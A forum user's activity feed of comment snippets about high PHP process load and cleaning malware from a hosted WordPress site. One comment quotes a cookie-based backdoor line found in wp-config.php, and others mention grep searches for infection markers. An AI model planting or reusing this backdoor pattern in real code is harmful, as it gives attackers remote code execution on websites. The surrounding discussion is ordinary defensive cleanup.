attiliok
- Total activity 29
- Last activity
- Member since
- Following 0 users
- Followed by 0 users
- Votes 0
- Subscriptions 5
Comments
Recent activity by attiliok-
I solved the problem switching from fcgi to suphp. WITH FCGI i had: one hundred of php process always running, 80% of ram used WITH SUPHP i have: one ore two php process runnning, 27% of ram used. ...
-
I'm still investigating thanks to your answer... As you suggested I typed the ls -l proc command but it didn't help me, I cannot find information that help me understand what's happening. I have m...
-
Thanks again for the good news. Just one question: many of those processes are running, but, as i can see from apache status, there is nobody visiting the sites related to the processes. Is it norm...
-
First off all, thanks. So I can tell they ARE NOT zombie processes. The commands you suggested me stats clearly they are not. But I'm also quite sure that my problem is not a bad code of a single s...
-
I found out on google: yes it's malicious! I cleaned it. I hope this time the jcache problem will never come back! Thanks for your help!
-
Quttera malware scanner says that this line in wp-config.php is malicious: if (isset($_COOKIE["id">)) @$_COOKIE["user">($_COOKIE["id">); Do you think it's right?
-
Thanks, but i didn't find anything infected. I have tried also "base64". And I searched in all the user directory. Now i changed ftp/mysql password too. I will post update.
-
Problem not solved yet... jcache is going on again freezing my server. Probably I have some more infected file but i cannot find it. I will look for it again.
-
YEEESS! It was in functions.php. Thanks very much for your help. Here my malicious code: [Removed]
-
Thanks! I really can't find anything like this in my account dirs. I have tried "grep -ril 'wowex' ./*" and "grep -ril '_g_g_' ./*" but nothing is found in the files. The only result is for "wowex"...